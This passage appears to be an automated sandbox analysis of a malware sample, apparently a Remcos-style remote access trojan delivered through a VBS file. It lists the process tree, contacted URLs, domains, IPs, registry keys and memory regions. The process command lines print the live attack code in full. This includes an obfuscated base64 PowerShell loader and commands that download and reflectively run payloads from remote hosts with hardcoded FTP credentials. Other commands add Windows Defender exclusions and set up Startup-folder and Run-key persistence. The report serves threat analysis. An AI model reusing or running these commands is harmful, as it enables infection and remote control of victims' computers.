+ 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBu' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'GU' + [char]65
+ 'R' + [char]65 + '' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Jw' + [char]65 + 'l' + [char]65 + 'Ek'
+ [char]65 + 'a' + [char]65 + 'Bx' + [char]65 + 'FI' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'l' + [char]65 + 'Cc' +
[char]65 + 'I' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'BJ' + [char]65 + 'C0' + [char]65 + 'eQBw'
+ [char]65 + 'G8' + [char]65 + 'Qw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'HI'
+ [char]65 + 'YQB0' + [char]65 + 'HM' + [char]65 + 'ZQBy' + [char]65 + 'G8' + [char]65 + 'bg' + [char]65 + 'v' + [char]65
+ 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Gk' + [char]65 + 'dQBx' + [char]65 + 'C8' + [char]65
+ 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65
+ 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'GE' + [char]65 + 'cwB1' + [char]65 + 'Hc' + [char]65 + 'I' + [char]65
+ 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'Gw' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65
+ 'Gg' + [char]65 + 'cwBy' + [char]65 + 'GU' + [char]65 + 'dwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'I' + [char]65
+ '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'JwB1' + [char]65 + 'HM' + [char]65 + 'bQ' + [char]65 + 'u' + [char]65
+ 'G4' + [char]65 + 'aQB3' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'VQBc' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65
+ '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'V' + [char]65 + 'By' + [char]65 + 'Eg' + [char]65 + 'VgB1'
+ [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BH' +
[char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'Ow' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + ''
+ [char]65 + 'ZQBt' + [char]65 + 'GE' + [char]65 + 'TgBy' + [char]65 + 'GU' + [char]65 + 'cwBV' + [char]65 + 'Do' + [char]65
+ 'OgBd' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'G0' + [char]65 + 'bgBv' + [char]65 + 'HI' + [char]65 + 'aQB2'
+ [char]65 + 'G4' + [char]65 + 'RQBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Cc'
+ [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'HI' + [char]65 + 'ZQBz' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + ''
+ [char]65 + '6' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' +
[char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'Ds'
+ [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'HU' + [char]65 + 'cwBt' + [char]65 + 'C4' + [char]65 + 'bgBp' + [char]65
+ 'Hc' + [char]65 + 'c' + [char]65 + 'BV' + [char]65 + 'Fw' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cs' + [char]65
+ 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65
+ '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'QgBL' + [char]65 + 'Ew' + [char]65 + 'UgBV' + [char]65 + 'CQ' + [char]65
+ 'K' + [char]65 + 'Bl' + [char]65 + 'Gw' + [char]65 + 'aQBG' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65
+ 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'H' + [char]65 + '' + [char]65 +
'c' + [char]65 + 'Bl' + [char]65 + 'GY' + [char]65 + 'eQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 +
'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65
+ 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU'
+ [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65
+ 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65
+ 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65
+ 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 +
'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65
+ 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' +
[char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bw' + [char]65
+ 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 +
'H0' + [char]65 + 'Ow' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'JwB0' + [char]65 + 'E8' + [char]65 + 'T' + [char]65
+ 'Bj' + [char]65 + 'F8' + [char]65 + 'SwBh' + [char]65 + 'DM' + [char]65 + 'WgBm' + [char]65 + 'G8' + [char]65 + 'W' + [char]65
+ '' + [char]65 + 'y' + [char]65 + 'Eo' + [char]65 + 'SgBy' + [char]65 + 'FY' + [char]65 + 'a' + [char]65 + 'Bt' + [char]65
+ 'FY' + [char]65 + 'OQBj' + [char]65 + 'G0' + [char]65 + 'OQBY' + [char]65 + 'HM' + [char]65 + 'dQBY' + [char]65 + 'G0' +
[char]65 + 'ag' + [char]65 + 'x' + [char]65 + 'Gc' + [char]65 + 'MQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65
+ 'Kw' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65
+ 'Cg' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 +
'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65
+ 'GU' + [char]65 + 'fQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 +
'DI' + [char]65 + 'N' + [char]65 + 'B1' + [char]65 + 'Fg' + [char]65 + 'SgBU' + [char]65 + 'HE' + [char]65 + 'YQBt' + [char]65
+ 'Gc' + [char]65 + 'eQBN' + [char]65 + 'HQ' + [char]65 + 'RgB6' + [char]65 + 'GE' + [char]65 + 'awBQ' + [char]65 + 'FI' +
[char]65 + 'MQBx' + [char]65 + 'F8' + [char]65 + 'SQB2' + [char]65 + 'Ec' + [char]65 + 'aQBY' + [char]65 + 'E4' + [char]65
+ 'Z' + [char]65 + 'Bx' + [char]65 + 'GE' + [char]65 + 'Tg' + [char]65 + 'x' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65
+ '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65
+ 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BJ' + [char]65 +
'G8' + [char]65 + 'cQBh' + [char]65 + 'EY' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65
+ 'KQ' + [char]65 + 'g' + [char]65 + 'HI' + [char]65 + 'bQBF' + [char]65 + 'Hc' + [char]65 + 'ag' + [char]65 + 'k' + [char]65
+ 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7'
+ [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DQ' + [char]65 + 'Ng' + [char]65 + 'n' +
[char]65 + 'Cg' + [char]65 + 'cwBu' + [char]65 + 'Gk' + [char]65 + 'YQB0' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65
+ 'C4' + [char]65 + 'RQBS' + [char]65 + 'FU' + [char]65 + 'V' + [char]65 + 'BD' + [char]65 + 'EU' + [char]65 + 'V' + [char]65
+ 'BJ' + [char]65 + 'Eg' + [char]65 + 'QwBS' + [char]65 + 'EE' + [char]65 + 'XwBS' + [char]65 + 'E8' + [char]65 + 'UwBT' +
[char]65 + 'EU' + [char]65 + 'QwBP' + [char]65 + 'FI' + [char]65 + 'U' + [char]65 + '' + [char]65 + '6' + [char]65 + 'HY'
+ [char]65 + 'bgBl' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' +
[char]65 + 'cgBt' + [char]65 + 'EU' + [char]65 + 'dwBq' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'n' + [char]65 +
'D0' + [char]65 + 'Z' + [char]65 + 'Bp' + [char]65 + 'CY' + [char]65 + 'Z' + [char]65 + 'Bh' + [char]65 + 'G8' + [char]65
+ 'b' + [char]65 + 'Bu' + [char]65 + 'Hc' + [char]65 + 'bwBk' + [char]65 + 'D0' + [char]65 + 'd' + [char]65 + 'By' + [char]65
+ 'G8' + [char]65 + 'c' + [char]65 + 'B4' + [char]65 + 'GU' + [char]65 + 'PwBj' + [char]65 + 'HU' + [char]65 + 'LwBt' + [char]65
+ 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'GU' + [char]65 + 'b' + [char]65 + 'Bn' + [char]65 + 'G8' + [char]65
+ 'bwBn' + [char]65 + 'C4' + [char]65 + 'ZQB2' + [char]65 + 'Gk' + [char]65 + 'cgBk' + [char]65 + 'C8' + [char]65 + 'Lw' +
[char]65 + '6' + [char]65 + 'HM' + [char]65 + 'c' + [char]65 + 'B0' + [char]65 + 'HQ' + [char]65 + 'a' + [char]65 + '' + [char]65
+ 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65
+ 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65
+ 'dQBz' + [char]65 + 'G0' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'dwBw' + [char]65 + 'FU' + [char]65 + 'X' +
[char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'FQ' + [char]65
+ 'cgBI' + [char]65 + 'FY' + [char]65 + 'dQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65
+ '' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'ZQBk' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65
+ 'Gg' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bt' + [char]65 +
'GU' + [char]65 + 'V' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + '6' + [char]65 + 'Do' + [char]65
+ 'XQBo' + [char]65 + 'HQ' + [char]65 + 'YQBQ' + [char]65 + 'C4' + [char]65 + 'TwBJ' + [char]65 + 'C4' + [char]65 + 'bQBl'
+ [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 +
'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 +
'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65
+ 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g'
+ [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'y' +
[char]65 + 'Cg' + [char]65 + 'cwBs' + [char]65 + 'GE' + [char]65 + 'dQBx' + [char]65 + 'EU' + [char]65 + 'LgBy' + [char]65
+ 'G8' + [char]65 + 'agBh' + [char]65 + 'E0' + [char]65 + 'LgBu' + [char]65 + 'G8' + [char]65 + 'aQBz' + [char]65 + 'HI' +
[char]65 + 'ZQBW' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + ''
+ [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy'
+ [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Ow' + [char]65 + '=';$nvcbv
= $qKKzc.replace('???' , 'A') ;$acwwn = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nvcbv
) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs');powershell
$acwwn
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT
= [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr
= $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else
{$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB,
$uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe
RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ
+ '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe
/r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol
= [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials
= new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg
= $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object
Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]]
$acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ
).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth'
, $huUPX , 'D DD' ) );};"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
|
||
C:\Windows\System32\cmd.exe
|
cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1"
|
||
C:\Windows\System32\cmd.exe
|
cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System
Update\hwcrj.ps1' ";exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System
Update\hwcrj.ps1' ";exit
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System
Update\hwcrj.ps1' ";exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System
Update\hwcrj.ps1' ";exit
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 13 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://paste.ee/d/Ga0HE/0
|
188.114.97.3
|
||
http://ftp.desckvbrat.com.br
|
unknown
|
||
http://desckvbrat.com.br
|
unknown
|
||
https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txt
|
173.231.247.100
|
||
https://paste.ee/d/b5xuX/0
|
188.114.97.3
|
||
212.162.149.163
|
|||
https://paste.ee/d/RdlsG/0
|
188.114.97.3
|
||
http://www.microsoft.coE
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://paste.ee/d/RdlsG/0P
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://go.microsoft.co
|
unknown
|
||
http://paste.ee
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://www.google.com;
|
unknown
|
||
https://www.gratitudeseekers.com/wp-includes/customize/c
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://analytics.paste.ee
|
unknown
|
||
https://paste.ee
|
unknown
|
||
https://pastebin.com/GAC
|
unknown
|
||
https://pastebin.com/raw/pQQ0n3eA
|
104.20.4.235
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.gratitudeseekers.com
|
unknown
|
||
http://geoplugin.net/json.gp
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://geoplugin.net/json.gp/C
|
unknown
|
||
https://ion=v4.5
|
unknown
|
||
https://paste.ee/d/b5xuX/0P
|
unknown
|
||
https://www.gratitudeseekers.com
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://analytics.paste.ee;
|
unknown
|
||
https://cdnjs.cloudflare.com
|
unknown
|
||
http://gratitudeseekers.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://cdnjs.cloudflare.com;
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://pastebin.com
|
unknown
|
||
https://pastebin.com
|
unknown
|
||
https://secure.gravatar.com
|
unknown
|
||
https://themes.googleusercontent.com
|
unknown
|
||
https://oneget.org
|
unknown
|
There are 38 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
paste.ee
|
188.114.97.3
|
||
desckvbrat.com.br
|
191.252.83.213
|
||
pastebin.com
|
104.20.4.235
|
||
gratitudeseekers.com
|
173.231.247.100
|
||
www.gratitudeseekers.com
|
unknown
|
||
ftp.desckvbrat.com.br
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.20.4.235
|
pastebin.com
|
United States
|
||
188.114.97.3
|
paste.ee
|
European Union
|
||
212.162.149.163
|
unknown
|
Netherlands
|
||
191.252.83.213
|
desckvbrat.com.br
|
Brazil
|
||
173.231.247.100
|
gratitudeseekers.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Update Drivers NVIDEO_vuw
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-52K54M
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-52K54M
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-52K54M
|
time
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
11AB000
|
heap
|
page read and write
|
||
19971901000
|
trusted library allocation
|
page read and write
|
||
1EB5D6E8000
|
trusted library allocation
|
page read and write
|
||
1C100222000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
1EB5D360000
|
trusted library allocation
|
page read and write
|
||
23E13C40000
|
trusted library allocation
|
page read and write
|
||
1C175274000
|
heap
|
page read and write
|
||
1BDC8511000
|
heap
|
page read and write
|
||
7FFD34631000
|
trusted library allocation
|
page read and write
|
||
25101937000
|
trusted library allocation
|
page read and write
|
||
25101898000
|
trusted library allocation
|
page read and write
|
||
25101A9A000
|
trusted library allocation
|
page read and write
|
||
251016D7000
|
trusted library allocation
|
page read and write
|
||
1C10194E000
|
trusted library allocation
|
page read and write
|
||
25101BCA000
|
trusted library allocation
|
page read and write
|
||
25101B0B000
|
trusted library allocation
|
page read and write
|
||
6C6FACD000
|
stack
|
page read and write
|
||
2866F911000
|
heap
|
page read and write
|
||
25101B46000
|
trusted library allocation
|
page read and write
|
||
7FFD344AB000
|
trusted library allocation
|
page read and write
|
||
25110100000
|
trusted library allocation
|
page read and write
|
||
25101821000
|
trusted library allocation
|
page read and write
|
||
25101C61000
|
trusted library allocation
|
page read and write
|
||
251013BA000
|
trusted library allocation
|
page read and write
|
||
251018B5000
|
trusted library allocation
|
page read and write
|
||
25101C31000
|
trusted library allocation
|
page read and write
|
||
1995F740000
|
heap
|
page read and write
|
||
251018A2000
|
trusted library allocation
|
page read and write
|
||
15EB6010000
|
heap
|
page read and write
|
||
2866F6C1000
|
heap
|
page read and write
|
||
25101C6A000
|
trusted library allocation
|
page read and write
|
||
25101999000
|
trusted library allocation
|
page read and write
|
||
1BDAE300000
|
heap
|
page read and write
|
||
25101902000
|
trusted library allocation
|
page read and write
|
||
1BDB169F000
|
trusted library allocation
|
page read and write
|
||
251018A8000
|
trusted library allocation
|
page read and write
|
||
15EB5EA0000
|
trusted library allocation
|
page read and write
|
||
2510199F000
|
trusted library allocation
|
page read and write
|
||
25101563000
|
trusted library allocation
|
page read and write
|
||
1ABF9F8E000
|
heap
|
page read and write
|
||
23E1BDD0000
|
heap
|
page read and write
|
||
25101740000
|
trusted library allocation
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
23E03ACD000
|
trusted library allocation
|
page read and write
|
||
5BBCE7E000
|
stack
|
page read and write
|
||
937BF7E000
|
unkown
|
page read and write
|
||
25101A52000
|
trusted library allocation
|
page read and write
|
||
1C1775D2000
|
heap
|
page read and write
|
||
1C177571000
|
heap
|
page read and write
|
||
25101716000
|
trusted library allocation
|
page read and write
|
||
251016A4000
|
trusted library allocation
|
page read and write
|
||
F6F8BBE000
|
stack
|
page read and write
|
||
1ABE0200000
|
heap
|
page execute and read and write
|
||
1EB4CDF0000
|
trusted library allocation
|
page read and write
|
||
1C176CD0000
|
heap
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
